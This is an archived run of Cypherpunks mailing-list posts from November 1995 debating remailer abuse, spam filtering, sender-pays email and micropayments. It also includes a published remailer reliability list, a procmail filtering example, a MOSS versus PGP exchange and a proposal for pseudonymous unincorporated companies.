know my number--no one'll get through unless I already know him. And then in
the brave unregulated future, if you make a new friend, you merely swipe his
public-key business card through your PDA, which adds it to your "accept
calls and emails from" list.

And to take a stab at another pair of Greg's questions, if A is sending
messages from his account on X's system to B, and B doesn't want to receive
them, should B have the right to make X stop A? No. (Not that I think the
law is going to realize that any time soon.) Should X have the right to stop
A? Hell yes--it's his system. Let A find a more open-minded ISP if he
doesn't like it.

Corey Bridges
Security Scribe
Netscape Communications Corporation
415-528-2978






From tcmay at got.net  Mon Nov 20 05:00:33 1995
From: tcmay at got.net (Timothy C. May)
Date: Mon, 20 Nov 1995 21:00:33 +0800
Subject: Paid Delivery (was Re: remailer abuse)
Message-ID: <acd55af301021004bafc@[205.199.118.202]>


At 5:21 AM 11/20/95, Corey Bridges wrote:
>At 05:27 PM 11/19/95 -0800, Greg Broiles wrote:
>>...
>> If A wants to send
>>messages to B, but B doesn't want to receive them, should A be forced to
>>stop sending?
>
>My rambling $.02:
>
>I haven't thought all this through, but I have an emerging stance. Just this
>week I've started ploughing through the Cyphernomicon, and was smacked in
>the face with the eminently pragmatic Mr. May's statement that any law that
>cannot be enforced should not exist.

Thanks. It's always heartening to see that someone is affected positively
by one's arguments.

>Up until, say, this week, I'd always been in favor of Caller ID. I'd figured
>if anyone wants to call me, I have the right to know who it is. By default,
>I had adopted this position concerning email. Now, one day I will receive an
>anonymous email. Will I be offended? Maybe. Can I do anything about it? Not
>likely. Anonymous communication is only going to get easier. Current

Yes, anonymous communication is getting easier, and the costs of trying to
stop it are becoming impossibly high. It would essentially require a police
state to stop, and even then it probably couldn't be stopped...for example,
I could always set up a "Tim's Quoting Service," which passes on anonymous
mail to a recipient with the "Hey, someone says this..." Could I be
prosecuted? Not even in a police state. Just one of dozens of approaches to
skirt such laws.

However, anticipating your next point, this does not mean anonymous
communication bandwidth will become infinite. Solutions are predictable.
See below.

>congressional prattling notwithstanding, the onus of responsibility will
>have to shift to the recipient. For example, I could configure my mail
>program to automatically throw away any incoming message with "anonymous" in
>the "From" header. (Or any message from *@pseudo.goldenbear.com, for that
>matter)
>
>If junk mail continues to bother people, it's only a matter of time until
>mail programs' filtering capabilities become much more sophisticated. (Of
>course, for all I know, there already ARE programs that do what I'm about to
>propose.) People can maintain a "do not accept from" list, containing every
>anonymous remailer they've ever heard about, or an "accept only from" list,

Many of us do this all the time. The Macintosh (and Windows) mail program I
currently use is "Eudora Pro," from Qualcomm. Extensive filtering options.
Certainly it is possible to set up filters to put mail from "anonymous"
into mailboxes, or the trash. And just as possible, though a bit more
involved, to put mail from _desired_ sources into boxes, or have a priority
flag raised, etc.

What if one is "bombarded" by mail, thousands of messages a day, or many
megabytes?

There are two main options, besides meaningless clamoring for legislation
against "junk mail":

1. Some services, like Prodigy, allow one to discard a message before
reading it, with no charge. (Seeing the sender and message name only.) This
does not solve the problem completely, but it certainly eliminates cost to
the enduser. The service provider still has the mail, but at least his
network connections are likely to not be much affected....still possible to
bring the service to its knees, which brings up the second approach....:

2. Sender pays the costs of transmission. That is, if someone wishes to
send 10 megabytes to a site, at least _he_ (or _she_) pays the freight.
This is of course the way things now work with the U.S. postal system, with
"Postage Due" no longer common: if the sender doesn't

In the real world, nothing is really free, so the whole economics of the
Internet has been deceiving for quite some time. The notion that one can
"spam" for free, shipping megabytes to thousands of sites, has led to
strange notions about the economics of the Net and, as a result, for calls
for new laws about "unwanted e-mail," "spamming," etc.

Of course, most users on the Net are now paying for connectivity one way or
another. Even U.C. Berkeley, one of the pioneers in Unix and campus
connections to the Net, has subcontracted out it's Net connections to
Netcom, with students and faculty paying around $15 a month. A sign of the
times. (There are also reasons why at least so far it has proven viable to
_not_ charge for individual transmissions. Various kinds of subsidies.)

Filtering is a solution for the reader not to have see stuff he doesn't
want to see, but he or his ISP may still receive the stuff, even if it gets
discarded, which is why the long term solution is likely to involve paid
deliveries.

(Needless to say, this is not currently part of the Net, and I'm not
suggesting it will happen anytime soon, or because I happen to think it's a
solution. Rather, what I'm saying is that it's a _technological_ and
_market_ solution to the "problem" of spammage and "unwanted mail filling
up our mailboxes." How it happens is unclear. But think of how markets
generally evolve to deal with what would naively be seen as unsolvable
crises or shortages. Long before we all are getting gigabytes of unwanted
stuff every day, alternatives will develop. I am confident that paid
delivery is one of the keys.)


>And to take a stab at another pair of Greg's questions, if A is sending
>messages from his account on X's system to B, and B doesn't want to receive
>them, should B have the right to make X stop A? No. (Not that I think the
>law is going to realize that any time soon.) Should X have the right to stop
>A? Hell yes--it's his system. Let A find a more open-minded ISP if he
>doesn't like it.

Amen. Exactly.


>Corey Bridges
>Security Scribe
>Netscape Communications Corporation
 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Interesting. And now I'm even happier to have partly made a convert.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From anonymous-remailer at shell.portal.com  Mon Nov 20 05:41:42 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Mon, 20 Nov 1995 21:41:42 +0800
Subject: WRITTEN CODE
Message-ID: <199511201316.FAA09442@jobe.shell.portal.com>


On Sat, 18 Nov 1995 s1113645 at tesla.cc.uottawa.ca wrote:

> Curious, where is uncg.edu? Your French name doesn't make me think you're 
> in the States (as an .edu address might suggest, but then not necessarily 
> either). (univ of Calgary?)

I think the University of Calgary is actually in the .ca domain. 

It's a Canadian address.  Its just like your very own domain.  Your
machine tesla is on uottawa.ca.  Your University of Ottawa address is not
in .edu, but is in .ca. 

It's interesting though, that you brought up Calgary.

Calgary, as I assume our Ottawa poster knows, was very busy over the last
week.  Grand Central station.  All of the politico's seemed to transit the
city. 

Reform Party Leader, Preston Manning, and Conservative Party Leader, Jean
Charest, held duelling fund-raising dinners this last Wednesday in
Calgary.  And Canada's ambassador to the United States, the Prime
Minister's nephew -- Raymond Chretien -- left Washington and spoke to the
Calgary Chamber of Commerce about NAFTA on Friday. 

Chretien was particularly troubled by remarks from Senate Majority Leader
Bob Dole, about wanting to re-open Chapter 19 in the NAFTA.  Following his
Chamber of Commerce address, Chretien was quoted as saying, "For us,
Chapter 19 is the heart of NAFTA.  And this dispute mechanism has been put
in there to take into account the fact that we are a much smaller economy,
a much smaller country.  We have to rely on those tri-national panels to
defend our interests." 

Chretien for now is chalking up the threatening comments to political 
posturing in the run-up to the presidential election next year, otherwise 
he said, "we will have a serious problem."

Chretien also played down security concerns after a knife-wielding
intruder broke into his uncle's (the Prime Minister's) home at 24 Sussex. 
Despite living in Washington, D.C., Chretien said he doesn't fear for his
public safety.  

When he was asked about the lack of visible protection during his visit to
Calgary, he said: "I'm just a humble public servant." 



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.









From raph at CS.Berkeley.EDU  Mon Nov 20 07:12:12 1995
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Mon, 20 Nov 1995 23:12:12 +0800
Subject: List of reliable remailers
Message-ID: <199511201450.GAA11841@kiwi.cs.berkeley.edu>


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list at kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys at kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list at kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail at extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney at shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal at alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere at bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail at c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon at anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer at ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer at utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer at flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer at rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster at remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"syrinx"} = "<syrinx at c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer at bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller at c2.org> cpunk pgp hash latent ek";
$remailer{"vishnu"} = "<mixmaster at vishnu.alias.net> cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo at c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer at replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer at valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer at armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ecafe"} = "<cpunk at remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono at valhalla.phoenix.net> cpunk mix pgp. hash latent cut ek";
$remailer{"shinobi"} = "<remailer at shinobi.alias.net> cpunk mix pgp. hash latent cut ek reorder";
catalyst at netcom.com is _not_ a remailer.
lmccarth at ducie.cs.umass.edu is _not_ a remailer.
usura at replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(robo syrinx c2)
(flame hacktic replay)
(alumni portal)

Use "premail -getkeys pgpkeys at kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
ecafe    cpunk at remail.ecafe.org           --*+* *+* .-  3:47:29  99.20%
robo     robo at c2.org                      #** *##+  ##     1:57  99.04%
hacktic  remailer at utopia.hacktic.nl       *** ***+* **     9:23  98.98%
spook    remailer at valhalla.phoenix.net    ++* ** +* **    19:50  98.83%
wmono    wmono at valhalla.phoenix.net       ++* ***+*  *    12:53  98.69%
rmadillo remailer at armadillo.com           ++++++ ++ ++    36:16  98.69%
hroller  hroller at c2.org                        ##+  ##      :51  98.68%
mix      mixmaster at remail.obscura.com     ----+-+ + -   1:13:12  98.54%
flame    remailer at flame.alias.net         ***  * +*  *    17:08  98.26%
replay   remailer at replay.com              ++*       **     7:26  98.05%
portal   hfinney at shell.portal.com         *      +* ##     3:56  97.99%
vishnu   mixmaster at vishnu.alias.net        **+**  +  *    16:08  97.79%
bsu-cs   nowhere at bsu-cs.bsu.edu           #** *#-+*  #     3:17  97.03%
ideath   remailer at ideath.goldenbear.com   ------- -  -  6:03:13  95.95%
penet    anon at anon.penet.fi               -----..- -   11:16:54  95.74%
alumni   hal at alumni.caltech.edu           *+* +  ++  #     5:01  95.02%
ford     remailer at bi-node.zerberus.de     _ _-.-+ +++  17:34:27  92.75%
extropia remail at extropia.wimsey.com       -..-- -----   5:46:08  92.40%
c2       remail at c2.org                    +++  +  + +     53:15  91.60%
rahul    homer at rahul.net                  -**+*#++* *      8:22  97.99%
syrinx   syrinx at c2.org                    +-  ++        5:13:50  28.61%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien





From s1113645 at tesla.cc.uottawa.ca  Mon Nov 20 07:30:22 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Mon, 20 Nov 1995 23:30:22 +0800
Subject: [noise] country domains
In-Reply-To: <199511201316.FAA09442@jobe.shell.portal.com>
Message-ID: <Pine.3.89.9511201055.A43418-0100000@tesla.cc.uottawa.ca>




On Mon, 20 Nov 1995 anonymous-remailer at shell.portal.com wrote:

> I think the University of Calgary is actually in the .ca domain. 
> 
> It's a Canadian address.  Its just like your very own domain.  Your
> machine tesla is on uottawa.ca.  Your University of Ottawa address is not
> in .edu, but is in .ca. 

True, but as the folks with the export-controlled ftp sites can tell you, you
can pretty much register as anything. Eg. U of Toronto has .edu addresses 
and .ca's , some of my friends around here have .net addresses, and I 
assume anyone anywhere in the world can probably get something like, 
..com, .net, .org (.edu's strictly controlled, isn't it?). (I even
know someone in montreal whose company machine is in .se since he works 
for Ericson (sp?) or somesuch scandinavian company).

Which is another spit in ITAR's face, or which meant that Tim wasn't 
able to get PGPfone from MIT (the prog couldn't figure out if his .net
address was in the US) and had to get it off an illegal usenet post.





From norm at netcom.com  Mon Nov 20 07:51:31 1995
From: norm at netcom.com (Norman Hardy)
Date: Mon, 20 Nov 1995 23:51:31 +0800
Subject: Good Enough?
Message-ID: <acd6488c0102100451b8@DialupEudora>


At 1:24 PM 11/14/95, Derek Atkins wrote:
>Hi.
>
>First, I must warn you that generating keys on behalf of users is in
>general a very bad thing to do.  Instead, you might want to provide a
>simple way for users to generate keys and get them certified.  The
>biggest problem is that there is not an easy way to get a good set of
>random numbers on a server platform.  On the other hand, users can get
>a great deal of randomness on their own client machines.  If they can
>run netscape, then they can run PGP.
....
I don't like to harp on this but you have stated the scenario so clearly,
that I ask:

If  the user cannot trust you to generate keys for him, why should
he trust the code that you provide to him? That code can have
errors like the old Netscape code except planted on purpose so
that the private key is guessable in 2^40 tries.

There are two answers, I think.
   The code is public and the user
   hopes that any flaws will be publicized.

The second is to use keyed information (not timing but character
information) to provide the random seed. That is the idea behind
my post a few weeks ago:
"Using deterministic programs to select private RSA keys"
Some may find that method less hazardous then trusting the culture
of publishing flaws in code.

I can forward that posting to anyone interested.







From ncognito at gate.net  Mon Nov 20 08:06:33 1995
From: ncognito at gate.net (Ben Holiday)
Date: Tue, 21 Nov 1995 00:06:33 +0800
Subject: remailer abuse
In-Reply-To: <199511200127.AA17430@ideath.goldenbear.com>
Message-ID: <Pine.A32.3.91.951119225404.61842A-100000@hopi.gate.net>


On Sun, 19 Nov 1995, Greg Broiles wrote:

> I think adopting a submissive or apologetic stance with respect to the 
> operation of a remailer is a mistake. What we do is protected by the First
> amendment, supports a 200+ year tradition of anonymous political speech in
> America, provides a valuable service to a worldwide community, and can help
> avoid the very abuse they are accused of facilitating. The child who was the

[extremely lucid comments clipped to save bandwidth]

Agreed, wholeheartedly. The above paragraph would be a perfect candidate 
for wide disemination across the net. 

The facts are that to eliminate the "abusive" mail would require 
crippling the remailer system to an unacceptable degree. Therefore we as 
operators are in a position of being forced to either tolerate messages 
that we may disagree (strongly) with, shut down the remailers, or resort 
to inadequate 40bit encryption and psuedo-anonymous Penti.fi remailing.
(no offense to Julf intended..)

I see nothing submissive or apologetic about pointing this fact out in a 
focused and organised way. In fact, making this fact plain might actually 
limit the number of people using the remailers to harrass other users. If 
general oppinion is that remailer operators accept and condone /all/ 
forms of communication, without regard for it potential effects, why 
shouldnt the spammer take advantage of our generosity?

Certainly being PC should not be the primary consideration in any 
undertaking, but the united states (and other nations) have well paid and 
well organised spin doctors working to convince the public that 
cryptographers and remail operators are "bad" people who's only purpose 
is to aid pedophiles and other criminals in carrying out their dastardly 
deeds. Ignoring the political implications of operating a remailer is 
simply foolish. Public oppinion is going to be an important consideration 
when the laws come to the table. Sure, we could move the remailers off 
shore, but why do that unless we have to? The idea of being a 
"cryptorebel", or an underground warrior for peace and privacy is 
certainly romantic, but i'd like to think that it doesnt have to be that way.

Then again, i didnt need propaganda to convince me that I needed privacy. 
Maybe im just strange..







From tcmay at got.net  Mon Nov 20 08:38:14 1995
From: tcmay at got.net (Timothy C. May)
Date: Tue, 21 Nov 1995 00:38:14 +0800
Subject: Micropayments article?
Message-ID: <acd526a100021004703d@[205.199.118.202]>


At 1:46 AM 11/20/95, Lucky Green wrote:
>Would somone please send me a pointer to the micropayment article?

http://theory.lcs.mit.edu/~rivest/

I am copying the list because, perhaps counterintuitively, it will save
bandwidth and overall effort. The reasons are left as an exercise in game
theory for the student.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From shamrock at netcom.com  Mon Nov 20 09:18:21 1995
From: shamrock at netcom.com (Lucky Green)
Date: Tue, 21 Nov 1995 01:18:21 +0800
Subject: Micropayments article?
Message-ID: <Pine.3.89.9511191738.A5801-0100000@netcom5>


Would somone please send me a pointer to the micropayment article?


TIA,









From raph at c2.org  Mon Nov 20 09:18:23 1995
From: raph at c2.org (Raph Levien)
Date: Tue, 21 Nov 1995 01:18:23 +0800
Subject: Design proposal: crypto-capable generic interface
In-Reply-To: <199511192347.PAA07661@tess-turbo.mit.edu>
Message-ID: <Pine.SUN.3.91.951119172235.23425B-100000@infinity.c2.org>




On Sun, 19 Nov 1995, Derek Atkins wrote:

> What do you mean by "technically superior"?  What technical merits
> does MOSS have over PGP?  It does have a better protocol with which to
> integrate it into mailers, but it is only a transmission protocol, not
> a security mechanism change.  Worse, MOSS uses X.509, which requires a
> lot of overhead for certificates.

Ah, I was hoping that my statement would stir some controversy. I've 
learned that well thought out, carefully reasoned posts never get any 
response.

I agree with you that the X.509 stuff is extra baggage in MOSS. 
Fortunately, the use of X.509 is optional.

MOSS has two very large advantages over PGP:

1. It can operate without temp files.

2. It has no non-MIME variant.

It will take forever for PGP/MIME to catch on. Thus, PGP will never 
really be a suitable candidate for my generic interface. Ah well.

> On the other hand, the MIME-PGP protocol can provide the same
> integration functionality as MOSS and still allow the use of the
> simple PGP certification structure that already exists.

This is true. I hope it happens.

> -derek
> 

Raph






From greg at ideath.goldenbear.com  Mon Nov 20 09:21:52 1995
From: greg at ideath.goldenbear.com (Greg Broiles)
Date: Tue, 21 Nov 1995 01:21:52 +0800
Subject: remailer abuse
Message-ID: <199511200127.AA17430@ideath.goldenbear.com>


-----BEGIN PGP SIGNED MESSAGE-----


Remailers exist (at least mine does) to make possible the dissemination of
unpopular views. "Unpopular" depends on context; so does "abuse". The line
between "unpopular" and "abuse" is difficult to draw.

On the one hand, the recent "Mr. Pedophile" message seemed intended to make
the recipient uncomfortable or offended probably because of illegitimate
reasons (purportedly, pedophilia). Other messages which cause complaints seem
to be responses to something that the "victim" has done or said somewhere
else. It's tempting to say that a message which lays out in logical fashion
coherent arguments explaining why the "victim's" original message is wrong is
likely to cause discomfort or embarassment but is legitimate, while a message
which says, to quote from a complaint message I received this weekend, 
"Fuck you asshole. I hope you choke on your son's sperm." isn't legitimate
even though it may also cause discomfort or embarassment. So I guess it's 
not so much a message's effect upon its recipient (or its intended effect)
which is legitimate or illegitimate as it is the message's means of doing so.
And that seems really tough to judge, where a remailer operator doesn't
know the context in which a message is sent.

(I do think it's possible that the "Mr. Pedophile" message was sent by another
child or teenager intending to torment the target, not by an actual 
pedophile. It's possible that the sender was the target himself. It's also
possible that the sender was an actual pedophile or a child-hostile adult, 
but that's not the only plausible explanation. People do strange, strange
stuff.)

In a situation where person A uses system X to send messages to person B who
uses system Y, I'm not sure what B can expect from the system operator of
system X. (I'm thinking about net custom here, not law.) If A wants to send
messages to B, but B doesn't want to receive them, should A be forced to
stop sending? Does X have an obligation to make A stop? Does X have an
obligation to modify his system such that messages from A to B are 
automagically suppressed? Does X have an obligation to refuse service to A
(and forego payment for service from A) if A won't stop sending to B? 
Is the answer different if B doesn't want the messages because they 
(are likely to) contain profanity? or because they are from a person of the
wrong religion? or because they're hostile or argumentative? 

As a first response I'm likely to say that if A knows (or should know, or
can guess and be pretty certain of the result) that B doesn't want to get a
particular message, A shouldn't send it. But then I realize that there are a
number of exceptions - what about if A's message to B is in response to a 
spam or otherwise inappropriate message from B? what about where B owes A
money? or if B has said something ridiculous or stupid and A is writing to
correct B? I think that there wouldn't be many inappropriate posts sent to
the C-punks list, for example, if everyone who thought a post was
inappropriate (not just factually arguable, or uninteresting) sent a message
to that effect; the impact of just a few hundred such messages in reply to
a single message would likely be burdensome enough to make the sender think
twice before sending again. But that inconvenience is anticipated by (and
motivates) the senders of those hundreds of messages. I still don't think
it's wrong to send the messages.

I guess my point is that eliminating "abuse" is pretty much impossible 
because abuse is in the eye of the beholder. I don't think we need to 
rely on the mercy or good graces of the net at large, though - remailers
will likely prove to be as difficult to eliminate as spammers have been.
The net is too big to be centrally policed, and individual providers often
have an incentive to tolerate behavior otherwise frowned upon because
they're being paid to do so. (and if they begin content filtering they
may lose any sort of quasi-common-carrier status they might enjoy now,
viz _Cubby v. Compuserve_, etc.) Even if the United States adopts rules
requiring messages be identified as to the sender, it won't be possible to
eliminate overseas remailers - and I imagine that folks would just start up
pseudonymous remailers. (I've worked on some prototype code and will
deploy a pseudonymous remailer - where people get names like 
"fjones at pseudo.goldenbear.com <Frank Jones>" instead of
"an12345 at pseudo.goldenbear.com <Anonymous Sender>", in order to divert or
confuse anti-anonymous policies or programs.)

I think adopting a submissive or apologetic stance with respect to the 
operation of a remailer is a mistake. What we do is protected by the First
amendment, supports a 200+ year tradition of anonymous political speech in
America, provides a valuable service to a worldwide community, and can help
avoid the very abuse they are accused of facilitating. The child who was the
target of the "Mr. Pedophile" message(s) should have been taught how to use
remailers and how to maintain his privacy on the net so that, if he really
is the victim of some sort of random child stalker, it won't happen again.
There's no reason why any child should post to the net under their real name,
or why their messages should be traceable to their physical bodies. If we're
concerned about protecting kids from bad people who might reach them via the
net, we need to teach kids how to send untraceable and unreplyable messages;
how to send messages and do business on the net without allowing hostile
or unscrupulous people to track them down; and how to make good choices 
about revealing personal information only to people who have a good reason
to know it.

People who are the targets of abusive messages or are concerned about
abusive messages are some of the people who need remailers and need 
pro-privacy network tools the most. Giving in to a knee-jerk anti-privacy
reaction only reinforces the erroneous notion that security is created
by an enforced lack of privacy.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMK/ZRn3YhjZY3fMNAQHQkQQAmLlRGcwEbJyhb9dYm3dx/BoRj0NBTUr3
MOmRkP2+AtdCKL8gcaWhnY9TeXHj7enezo5TF8ooqvcOLEha29mL9Q+G08t2pkoM
SGHr79Yr38syc6Mf+1pXAN7T1Dn600xgnJsDmrFFoQI5H0ZSeA6oLT3ShzhWpsJ/
3FuNvR7TyLg=
=nsOZ
-----END PGP SIGNATURE-----





From dreschs at mpd.tandem.com  Mon Nov 20 09:41:31 1995
From: dreschs at mpd.tandem.com (Sten Drescher)
Date: Tue, 21 Nov 1995 01:41:31 +0800
Subject: remailer abuse
In-Reply-To: <199511200524.VAA00445@netscape.com>
Message-ID: <199511201708.LAA17184@galil.austnsc.tandem.com>


Corey Bridges <corey at netscape.com> said:

CB> If junk mail continues to bother people, it's only a matter of time
CB> until mail programs' filtering capabilities become much more
CB> sophisticated. (Of course, for all I know, there already ARE
CB> programs that do what I'm about to propose.) People can maintain a
CB> "do not accept from" list, containing every anonymous remailer
CB> they've ever heard about, or an "accept only from" list, containing
CB> just the people they wish to converse with.

	Well, it might not be luser-friendly, but procmail does that:

:0
* (^From|^Sender|^TO).*(junk|mail|list)
/dev/null

:0
* (^From|^Sender|^TO).*(send|me|mail|list)
wanted.mail

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3





From Chris.Claborne at SanDiegoCA.ATTGIS.com  Mon Nov 20 09:44:38 1995
From: Chris.Claborne at SanDiegoCA.ATTGIS.com (Chris Claborne)
Date: Tue, 21 Nov 1995 01:44:38 +0800
Subject: "Junk E-Mail"
Message-ID: <9511201710.AA25590@toad.com>


At 06:47 PM 11/19/95 -0500, you wrote:
>
>  Is anyone else getting lots of junk e-mail lately? I'm getting all
>kinds of direct marketing crap to both of my main accounts and I haven't
>posted to usenet in months. 

   On a related note, Compuserve had a note on their system last week from
the sysop.  Their customers are receiving unwanted e-mail advertisements
from the Internet.  Compuserve sysops are attempting to block the spaming
but are finding it difficult because the advertiser is coming in via
different routes.  They are also attempting to stop them using the court
system.  

   The advertiser, according to the Compuserve sysop, threatened a
mail-bombing if Compuserve tried to block them!!!  This would be a just
cause to call in the CSOF (Cypherpunk Soldier of Fortune) for a "measured
response". 

                                        ...  __o
                                       ..   -\<,
Chris.Claborne at SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.






From drcharpe at hamlet.uncg.edu  Mon Nov 20 09:45:20 1995
From: drcharpe at hamlet.uncg.edu (Daniel 'genius' Charpentier)
Date: Tue, 21 Nov 1995 01:45:20 +0800
Subject: WRITTEN CODE
In-Reply-To: <199511201316.FAA09442@jobe.shell.portal.com>
Message-ID: <Pine.SOL.3.91.951120121240.18418A-100000@hamlet>




On Mon, 20 Nov 1995 anonymous-remailer at shell.portal.com wrote:

> On Sat, 18 Nov 1995 s1113645 at tesla.cc.uottawa.ca wrote:
> 
> > Curious, where is uncg.edu? Your French name doesn't make me think you're 
> > in the States (as an .edu address might suggest, but then not necessarily 
> > either). (univ of Calgary?)                                           

    uncg.edu is in North Carolina.  uncg stands for University of North
    Carolina at Greensboro.  







From hallam at w3.org  Mon Nov 20 11:13:03 1995
From: hallam at w3.org (hallam at w3.org)
Date: Tue, 21 Nov 1995 03:13:03 +0800
Subject: "Junk E-Mail"
In-Reply-To: <9511201710.AA25590@toad.com>
Message-ID: <9511201851.AA28000@zorch.w3.org>



>   The advertiser, according to the Compuserve sysop, threatened a
>mail-bombing if Compuserve tried to block them!!!  This would be a just
>cause to call in the CSOF (Cypherpunk Soldier of Fortune) for a "measured
>response". 

I think it would be better to slap a RICO suit onto the company concerned.
It sound to me like an attempt to gain financial advantage through threatening 
behaviour. Where I come from that means jail time.

	Phill





From sdavidm at iconz.co.nz  Mon Nov 20 11:46:57 1995
From: sdavidm at iconz.co.nz (David Murray)
Date: Tue, 21 Nov 1995 03:46:57 +0800
Subject: Anonymity and Intellectual Capital
In-Reply-To: <Pine.3.89.9511182108.B25524-0100000@tesla.cc.uottawa.ca>
Message-ID: <pnr747988188m@iconz.co.nz>


-----BEGIN PGP SIGNED MESSAGE-----

In message <Pine.3.89.9511182108.B25524-0100000 at tesla.cc.uottawa.ca>, s1113645 at tesla.cc.uottawa.ca said:
> On Sat, 18 Nov 1995, David Murray wrote:
> 
> > unincorporated, or deed of settlement, company.
> 
...
 
> Barring escrow services, I don't see how contracts (or a lot of 
> other laws) could be enforced against these entities when they can simply pop
> in and out of existence (unless they have some physical counterpart, like 
> a storefront and merchandise. But then these are easily linkable to True 
> Names, unlike software companies, financial services or any other part of 
> the info economy.)

But the assets of the company are held by (known) trustees and exposed to
judgment - the pseudonymous part just means that _only_ those assets are
exposed.

For instance, an enterprising cypherpunk decides it would be a good thing
to run a restaurant with a crypto-anarchy theme (cajun style Blacknet burgers,
anonymous avocado salad, Phil Zimmerman celebrity cocktail...). Unaccountably,
a thousand other cypherpunks decide to invest $100 each. More understandably,
they don't want it to be known that they invested. By buying shares in an
unincorporated company pseudonymously (including anonymously) they can risk
$100, but $100 only. The money is (initially) held in the trustee's bank
account (having been subscribed in ecash), so the cheques for the tables and
chairs won't bounce. The chairs, tables, kitchen equipment, lease etc will
also be held by the trustee on trust for the partnership/company, and will
be available for creditors should the partnership not meet its obligations.

So doing business with an unincorporated company is very much like doing
business with an incorporated company/corporation. (I can see that audited
accounts, for instance, could be useful in attracting investors/reassuring
creditors.)

Note that the argument works just as well for intangible assets - even digital
assets - as for tangible ones like tables. So our enterprising cypherpunk
might well have started a bank, insurance company or mutual fund (except for
all the other regulatory hassles :-)
  
> Besides, if companies in general can set up other companies, in a 
